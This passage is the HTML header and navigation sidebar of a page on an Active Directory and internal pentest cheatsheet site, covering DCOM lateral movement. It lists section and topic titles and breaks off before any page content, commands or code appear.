4274 lines
98 KiB
HTML
4274 lines
98 KiB
HTML
|
|
<!doctype html>
|
|
<html lang="en" class="no-js">
|
|
<head>
|
|
|
|
<meta charset="utf-8">
|
|
<meta name="viewport" content="width=device-width,initial-scale=1">
|
|
|
|
<meta name="description" content="Active Directory and Internal Pentest Cheatsheets">
|
|
|
|
|
|
|
|
<link rel="canonical" href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/internal-dcom/">
|
|
|
|
|
|
<link rel="prev" href="../hash-pass-the-key/">
|
|
|
|
|
|
<link rel="next" href="../internal-mitm-relay/">
|
|
|
|
|
|
<link rel="icon" href="../../assets/images/favicon.png">
|
|
<meta name="generator" content="mkdocs-1.6.1, mkdocs-material-9.5.44">
|
|
|
|
|
|
|
|
<title>Internal - DCOM - Internal All The Things</title>
|
|
|
|
|
|
|
|
|
|
<link rel="stylesheet" href="../../assets/stylesheets/main.0253249f.min.css">
|
|
|
|
|
|
<link rel="stylesheet" href="../../assets/stylesheets/palette.06af60db.min.css">
|
|
|
|
|
|
|
|
|
|
|
|
<style>
|
|
.social-container {
|
|
float: right;
|
|
}
|
|
</style>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
|
|
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,300i,400,400i,700,700i%7CRoboto+Mono:400,400i,700,700i&display=fallback">
|
|
<style>:root{--md-text-font:"Roboto";--md-code-font:"Roboto Mono"}</style>
|
|
|
|
|
|
|
|
<link rel="stylesheet" href="../../custom.css">
|
|
|
|
<script>__md_scope=new URL("../..",location),__md_hash=e=>[...e].reduce(((e,_)=>(e<<5)-e+_.charCodeAt(0)),0),__md_get=(e,_=localStorage,t=__md_scope)=>JSON.parse(_.getItem(t.pathname+"."+e)),__md_set=(e,_,t=localStorage,a=__md_scope)=>{try{t.setItem(a.pathname+"."+e,JSON.stringify(_))}catch(e){}}</script>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<meta property="og:type" content="website" >
|
|
|
|
<meta property="og:title" content="Internal - DCOM - Internal All The Things" >
|
|
|
|
<meta property="og:description" content="Active Directory and Internal Pentest Cheatsheets" >
|
|
|
|
<meta property="og:image" content="https://swisskyrepo.github.io/InternalAllTheThings/assets/images/social/active-directory/internal-dcom.png" >
|
|
|
|
<meta property="og:image:type" content="image/png" >
|
|
|
|
<meta property="og:image:width" content="1200" >
|
|
|
|
<meta property="og:image:height" content="630" >
|
|
|
|
<meta property="og:url" content="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/internal-dcom/" >
|
|
|
|
<meta name="twitter:card" content="summary_large_image" >
|
|
|
|
<meta name="twitter:title" content="Internal - DCOM - Internal All The Things" >
|
|
|
|
<meta name="twitter:description" content="Active Directory and Internal Pentest Cheatsheets" >
|
|
|
|
<meta name="twitter:image" content="https://swisskyrepo.github.io/InternalAllTheThings/assets/images/social/active-directory/internal-dcom.png" >
|
|
|
|
|
|
|
|
</head>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<body dir="ltr" data-md-color-scheme="default" data-md-color-primary="indigo" data-md-color-accent="indigo">
|
|
|
|
|
|
<input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
|
|
<input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
|
|
<label class="md-overlay" for="__drawer"></label>
|
|
<div data-md-component="skip">
|
|
|
|
|
|
<a href="#internal-dcom" class="md-skip">
|
|
Skip to content
|
|
</a>
|
|
|
|
</div>
|
|
<div data-md-component="announce">
|
|
|
|
</div>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<header class="md-header md-header--shadow" data-md-component="header">
|
|
<nav class="md-header__inner md-grid" aria-label="Header">
|
|
<a href="../.." title="Internal All The Things" class="md-header__button md-logo" aria-label="Internal All The Things" data-md-component="logo">
|
|
|
|
|
|
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"/></svg>
|
|
|
|
</a>
|
|
<label class="md-header__button md-icon" for="__drawer">
|
|
|
|
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 6h18v2H3zm0 5h18v2H3zm0 5h18v2H3z"/></svg>
|
|
</label>
|
|
<div class="md-header__title" data-md-component="header-title">
|
|
<div class="md-header__ellipsis">
|
|
<div class="md-header__topic">
|
|
<span class="md-ellipsis">
|
|
Internal All The Things
|
|
</span>
|
|
</div>
|
|
<div class="md-header__topic" data-md-component="header-topic">
|
|
<span class="md-ellipsis">
|
|
|
|
Internal - DCOM
|
|
|
|
</span>
|
|
</div>
|
|
</div>
|
|
</div>
|
|
|
|
|
|
<form class="md-header__option" data-md-component="palette">
|
|
|
|
|
|
|
|
|
|
<input class="md-option" data-md-color-media="(prefers-color-scheme: light)" data-md-color-scheme="default" data-md-color-primary="indigo" data-md-color-accent="indigo" aria-label="Switch to dark mode" type="radio" name="__palette" id="__palette_0">
|
|
|
|
<label class="md-header__button md-icon" title="Switch to dark mode" for="__palette_1" hidden>
|
|
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a4 4 0 0 0-4 4 4 4 0 0 0 4 4 4 4 0 0 0 4-4 4 4 0 0 0-4-4m0 10a6 6 0 0 1-6-6 6 6 0 0 1 6-6 6 6 0 0 1 6 6 6 6 0 0 1-6 6m8-9.31V4h-4.69L12 .69 8.69 4H4v4.69L.69 12 4 15.31V20h4.69L12 23.31 15.31 20H20v-4.69L23.31 12z"/></svg>
|
|
</label>
|
|
|
|
|
|
|
|
|
|
|
|
<input class="md-option" data-md-color-media="(prefers-color-scheme: dark)" data-md-color-scheme="slate" data-md-color-primary="indigo" data-md-color-accent="indigo" aria-label="Switch to light mode" type="radio" name="__palette" id="__palette_1">
|
|
|
|
<label class="md-header__button md-icon" title="Switch to light mode" for="__palette_0" hidden>
|
|
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 18c-.89 0-1.74-.2-2.5-.55C11.56 16.5 13 14.42 13 12s-1.44-4.5-3.5-5.45C10.26 6.2 11.11 6 12 6a6 6 0 0 1 6 6 6 6 0 0 1-6 6m8-9.31V4h-4.69L12 .69 8.69 4H4v4.69L.69 12 4 15.31V20h4.69L12 23.31 15.31 20H20v-4.69L23.31 12z"/></svg>
|
|
</label>
|
|
|
|
|
|
</form>
|
|
|
|
|
|
|
|
<script>var palette=__md_get("__palette");if(palette&&palette.color){if("(prefers-color-scheme)"===palette.color.media){var media=matchMedia("(prefers-color-scheme: light)"),input=document.querySelector(media.matches?"[data-md-color-media='(prefers-color-scheme: light)']":"[data-md-color-media='(prefers-color-scheme: dark)']");palette.color.media=input.getAttribute("data-md-color-media"),palette.color.scheme=input.getAttribute("data-md-color-scheme"),palette.color.primary=input.getAttribute("data-md-color-primary"),palette.color.accent=input.getAttribute("data-md-color-accent")}for(var[key,value]of Object.entries(palette.color))document.body.setAttribute("data-md-color-"+key,value)}</script>
|
|
|
|
|
|
|
|
<label class="md-header__button md-icon" for="__search">
|
|
|
|
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
|
|
</label>
|
|
<div class="md-search" data-md-component="search" role="dialog">
|
|
<label class="md-search__overlay" for="__search"></label>
|
|
<div class="md-search__inner" role="search">
|
|
<form class="md-search__form" name="search">
|
|
<input type="text" class="md-search__input" name="query" aria-label="Search" placeholder="Search" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="search-query" required>
|
|
<label class="md-search__icon md-icon" for="__search">
|
|
|
|
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
|
|
|
|
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11z"/></svg>
|
|
</label>
|
|
<nav class="md-search__options" aria-label="Search">
|
|
|
|
<a href="javascript:void(0)" class="md-search__icon md-icon" title="Share" aria-label="Share" data-clipboard data-clipboard-text="" data-md-component="search-share" tabindex="-1">
|
|
|
|
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M18 16.08c-.76 0-1.44.3-1.96.77L8.91 12.7c.05-.23.09-.46.09-.7s-.04-.47-.09-.7l7.05-4.11c.54.5 1.25.81 2.04.81a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3c0 .24.04.47.09.7L8.04 9.81C7.5 9.31 6.79 9 6 9a3 3 0 0 0-3 3 3 3 0 0 0 3 3c.79 0 1.5-.31 2.04-.81l7.12 4.15c-.05.21-.08.43-.08.66 0 1.61 1.31 2.91 2.92 2.91s2.92-1.3 2.92-2.91A2.92 2.92 0 0 0 18 16.08"/></svg>
|
|
</a>
|
|
|
|
<button type="reset" class="md-search__icon md-icon" title="Clear" aria-label="Clear" tabindex="-1">
|
|
|
|
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12z"/></svg>
|
|
</button>
|
|
</nav>
|
|
|
|
<div class="md-search__suggest" data-md-component="search-suggest"></div>
|
|
|
|
</form>
|
|
<div class="md-search__output">
|
|
<div class="md-search__scrollwrap" tabindex="0" data-md-scrollfix>
|
|
<div class="md-search-result" data-md-component="search-result">
|
|
<div class="md-search-result__meta">
|
|
Initializing search
|
|
</div>
|
|
<ol class="md-search-result__list" role="presentation"></ol>
|
|
</div>
|
|
</div>
|
|
</div>
|
|
</div>
|
|
</div>
|
|
|
|
|
|
<div class="md-header__source">
|
|
<a href="https://github.com/swisskyrepo/InternalAllTheThings" title="Go to repository" class="md-source" data-md-component="source">
|
|
<div class="md-source__icon md-icon">
|
|
|
|
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 496 512"><!--! Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2024 Fonticons, Inc.--><path d="M165.9 397.4c0 2-2.3 3.6-5.2 3.6-3.3.3-5.6-1.3-5.6-3.6 0-2 2.3-3.6 5.2-3.6 3-.3 5.6 1.3 5.6 3.6m-31.1-4.5c-.7 2 1.3 4.3 4.3 4.9 2.6 1 5.6 0 6.2-2s-1.3-4.3-4.3-5.2c-2.6-.7-5.5.3-6.2 2.3m44.2-1.7c-2.9.7-4.9 2.6-4.6 4.9.3 2 2.9 3.3 5.9 2.6 2.9-.7 4.9-2.6 4.6-4.6-.3-1.9-3-3.2-5.9-2.9M244.8 8C106.1 8 0 113.3 0 252c0 110.9 69.8 205.8 169.5 239.2 12.8 2.3 17.3-5.6 17.3-12.1 0-6.2-.3-40.4-.3-61.4 0 0-70 15-84.7-29.8 0 0-11.4-29.1-27.8-36.6 0 0-22.9-15.7 1.6-15.4 0 0 24.9 2 38.6 25.8 21.9 38.6 58.6 27.5 72.9 20.9 2.3-16 8.8-27.1 16-33.7-55.9-6.2-112.3-14.3-112.3-110.5 0-27.5 7.6-41.3 23.6-58.9-2.6-6.5-11.1-33.3 2.6-67.9 20.9-6.5 69 27 69 27 20-5.6 41.5-8.5 62.8-8.5s42.8 2.9 62.8 8.5c0 0 48.1-33.6 69-27 13.7 34.7 5.2 61.4 2.6 67.9 16 17.7 25.8 31.5 25.8 58.9 0 96.5-58.9 104.2-114.8 110.5 9.2 7.9 17 22.9 17 46.4 0 33.7-.3 75.4-.3 83.6 0 6.5 4.6 14.4 17.3 12.1C428.2 457.8 496 362.9 496 252 496 113.3 383.5 8 244.8 8M97.2 352.9c-1.3 1-1 3.3.7 5.2 1.6 1.6 3.9 2.3 5.2 1 1.3-1 1-3.3-.7-5.2-1.6-1.6-3.9-2.3-5.2-1m-10.8-8.1c-.7 1.3.3 2.9 2.3 3.9 1.6 1 3.6.7 4.3-.7.7-1.3-.3-2.9-2.3-3.9-2-.6-3.6-.3-4.3.7m32.4 35.6c-1.6 1.3-1 4.3 1.3 6.2 2.3 2.3 5.2 2.6 6.5 1 1.3-1.3.7-4.3-1.3-6.2-2.2-2.3-5.2-2.6-6.5-1m-11.4-14.7c-1.6 1-1.6 3.6 0 5.9s4.3 3.3 5.6 2.3c1.6-1.3 1.6-3.9 0-6.2-1.4-2.3-4-3.3-5.6-2"/></svg>
|
|
</div>
|
|
<div class="md-source__repository">
|
|
GitHub
|
|
</div>
|
|
</a>
|
|
</div>
|
|
|
|
</nav>
|
|
|
|
</header>
|
|
|
|
<div class="md-container" data-md-component="container">
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<main class="md-main" data-md-component="main">
|
|
<div class="md-main__inner md-grid">
|
|
|
|
|
|
|
|
<div class="md-sidebar md-sidebar--primary" data-md-component="sidebar" data-md-type="navigation" >
|
|
<div class="md-sidebar__scrollwrap">
|
|
<div class="md-sidebar__inner">
|
|
|
|
|
|
|
|
|
|
<nav class="md-nav md-nav--primary" aria-label="Navigation" data-md-level="0">
|
|
<label class="md-nav__title" for="__drawer">
|
|
<a href="../.." title="Internal All The Things" class="md-nav__button md-logo" aria-label="Internal All The Things" data-md-component="logo">
|
|
|
|
|
|
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"/></svg>
|
|
|
|
</a>
|
|
Internal All The Things
|
|
</label>
|
|
|
|
<div class="md-nav__source">
|
|
<a href="https://github.com/swisskyrepo/InternalAllTheThings" title="Go to repository" class="md-source" data-md-component="source">
|
|
<div class="md-source__icon md-icon">
|
|
|
|
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 496 512"><!--! Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2024 Fonticons, Inc.--><path d="M165.9 397.4c0 2-2.3 3.6-5.2 3.6-3.3.3-5.6-1.3-5.6-3.6 0-2 2.3-3.6 5.2-3.6 3-.3 5.6 1.3 5.6 3.6m-31.1-4.5c-.7 2 1.3 4.3 4.3 4.9 2.6 1 5.6 0 6.2-2s-1.3-4.3-4.3-5.2c-2.6-.7-5.5.3-6.2 2.3m44.2-1.7c-2.9.7-4.9 2.6-4.6 4.9.3 2 2.9 3.3 5.9 2.6 2.9-.7 4.9-2.6 4.6-4.6-.3-1.9-3-3.2-5.9-2.9M244.8 8C106.1 8 0 113.3 0 252c0 110.9 69.8 205.8 169.5 239.2 12.8 2.3 17.3-5.6 17.3-12.1 0-6.2-.3-40.4-.3-61.4 0 0-70 15-84.7-29.8 0 0-11.4-29.1-27.8-36.6 0 0-22.9-15.7 1.6-15.4 0 0 24.9 2 38.6 25.8 21.9 38.6 58.6 27.5 72.9 20.9 2.3-16 8.8-27.1 16-33.7-55.9-6.2-112.3-14.3-112.3-110.5 0-27.5 7.6-41.3 23.6-58.9-2.6-6.5-11.1-33.3 2.6-67.9 20.9-6.5 69 27 69 27 20-5.6 41.5-8.5 62.8-8.5s42.8 2.9 62.8 8.5c0 0 48.1-33.6 69-27 13.7 34.7 5.2 61.4 2.6 67.9 16 17.7 25.8 31.5 25.8 58.9 0 96.5-58.9 104.2-114.8 110.5 9.2 7.9 17 22.9 17 46.4 0 33.7-.3 75.4-.3 83.6 0 6.5 4.6 14.4 17.3 12.1C428.2 457.8 496 362.9 496 252 496 113.3 383.5 8 244.8 8M97.2 352.9c-1.3 1-1 3.3.7 5.2 1.6 1.6 3.9 2.3 5.2 1 1.3-1 1-3.3-.7-5.2-1.6-1.6-3.9-2.3-5.2-1m-10.8-8.1c-.7 1.3.3 2.9 2.3 3.9 1.6 1 3.6.7 4.3-.7.7-1.3-.3-2.9-2.3-3.9-2-.6-3.6-.3-4.3.7m32.4 35.6c-1.6 1.3-1 4.3 1.3 6.2 2.3 2.3 5.2 2.6 6.5 1 1.3-1.3.7-4.3-1.3-6.2-2.2-2.3-5.2-2.6-6.5-1m-11.4-14.7c-1.6 1-1.6 3.6 0 5.9s4.3 3.3 5.6 2.3c1.6-1.3 1.6-3.9 0-6.2-1.4-2.3-4-3.3-5.6-2"/></svg>
|
|
</div>
|
|
<div class="md-source__repository">
|
|
GitHub
|
|
</div>
|
|
</a>
|
|
</div>
|
|
|
|
<ul class="md-nav__list" data-md-scrollfix>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../.." class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Internal All The Things
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item md-nav__item--active md-nav__item--nested">
|
|
|
|
|
|
|
|
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_2" checked>
|
|
|
|
|
|
<label class="md-nav__link" for="__nav_2" id="__nav_2_label" tabindex="0">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Active directory
|
|
</span>
|
|
|
|
|
|
<span class="md-nav__icon md-icon"></span>
|
|
</label>
|
|
|
|
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_2_label" aria-expanded="true">
|
|
<label class="md-nav__title" for="__nav_2">
|
|
<span class="md-nav__icon md-icon"></span>
|
|
Active directory
|
|
</label>
|
|
<ul class="md-nav__list" data-md-scrollfix>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../ad-adcs-certificate-services/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Active Directory - Certificate Services
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../ad-adds-acl-ace/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Active Directory - Access Controls ACL/ACE
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../ad-adds-enumerate/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Active Directory - Enumeration
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../ad-adds-group-policy-objects/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Active Directory - Group Policy Objects
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../ad-adds-groups/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Active Directory - Groups
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../ad-adds-linux/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Active Directory - Linux
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../ad-adds-machineaccountquota/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Active Directory - Machine Account Quota
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../ad-adds-ntds-dumping/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Active Directory - NTDS Dumping
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../ad-adds-rodc/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Active Directory - Read Only Domain Controller
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../ad-adfs-federation-services/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Active Directory - Federation Services
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../ad-integrated-dns/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Active Directory - Integrated DNS - ADIDNS
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../ad-roasting-asrep/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Roasting - ASREP Roasting
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../ad-roasting-kerberoasting/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Roasting - Kerberoasting
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../ad-roasting-timeroasting/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Roasting - Timeroasting
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../ad-tricks/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Active Directory - Tricks
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../deployment-sccm/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Deployment - SCCM
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../deployment-wsus/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Deployment - WSUS
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../hash-capture/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Hash - Capture and Cracking
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../hash-over-pass-the-hash/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Hash - OverPass-the-Hash
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../hash-pass-the-hash/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Hash - Pass the Hash
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../hash-pass-the-key/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Hash - Pass The Key
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item md-nav__item--active">
|
|
|
|
<input class="md-nav__toggle md-toggle" type="checkbox" id="__toc">
|
|
|
|
|
|
|
|
|
|
|
|
<label class="md-nav__link md-nav__link--active" for="__toc">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Internal - DCOM
|
|
</span>
|
|
|
|
|
|
<span class="md-nav__icon md-icon"></span>
|
|
</label>
|
|
|
|
<a href="./" class="md-nav__link md-nav__link--active">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Internal - DCOM
|
|
</span>
|
|
|
|
|
|
</a>
|
|
|
|
|
|
|
|
<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<label class="md-nav__title" for="__toc">
|
|
<span class="md-nav__icon md-icon"></span>
|
|
Table of contents
|
|
</label>
|
|
<ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
|
|
|
|
<li class="md-nav__item">
|
|
<a href="#dcom-via-mmc-application-class" class="md-nav__link">
|
|
<span class="md-ellipsis">
|
|
DCOM via MMC Application Class
|
|
</span>
|
|
</a>
|
|
|
|
</li>
|
|
|
|
<li class="md-nav__item">
|
|
<a href="#dcom-via-office" class="md-nav__link">
|
|
<span class="md-ellipsis">
|
|
DCOM via Office
|
|
</span>
|
|
</a>
|
|
|
|
</li>
|
|
|
|
<li class="md-nav__item">
|
|
<a href="#dcom-via-shellexecute" class="md-nav__link">
|
|
<span class="md-ellipsis">
|
|
DCOM via ShellExecute
|
|
</span>
|
|
</a>
|
|
|
|
</li>
|
|
|
|
<li class="md-nav__item">
|
|
<a href="#dcom-via-shellbrowserwindow" class="md-nav__link">
|
|
<span class="md-ellipsis">
|
|
DCOM via ShellBrowserWindow
|
|
</span>
|
|
</a>
|
|
|
|
</li>
|
|
|
|
<li class="md-nav__item">
|
|
<a href="#references" class="md-nav__link">
|
|
<span class="md-ellipsis">
|
|
References
|
|
</span>
|
|
</a>
|
|
|
|
</li>
|
|
|
|
</ul>
|
|
|
|
</nav>
|
|
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../internal-mitm-relay/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Internal - MITM and Relay
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../internal-pxe-boot-image/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Internal - PXE Boot Image
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../internal-shares/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Internal - Shares
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../kerberos-bronze-bit/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Kerberos - Bronze Bit
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../kerberos-delegation-constrained/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Kerberos Delegation - Constrained Delegation
|
|
</span>
|
|
|
|
|
|
</a>
|
|
</li>
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
<li class="md-nav__item">
|
|
<a href="../kerberos-delegation-rbcd/" class="md-nav__link">
|
|
|
|
|
|
<span class="md-ellipsis">
|
|
Kerberos Delegation - Resource Based Constrained Delegation
|
|
</span>
|
|
|
|
|
|
